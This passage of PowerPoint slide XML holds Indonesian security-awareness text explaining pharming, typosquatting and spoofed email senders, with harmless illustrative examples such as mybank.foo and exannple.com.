              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mybank.foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP 2.2.2.2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pharming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resolusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP 6.6.6.6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ketik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Typosquatting</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Phishing dan pharming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipalsukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakkonsistenan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diwakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menampilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "Dari" di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sewenang-wenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperingatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbedaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Typosquatting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama domain yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> exannple.com, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbedaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepupu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> doppelganger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subdomain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibajak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
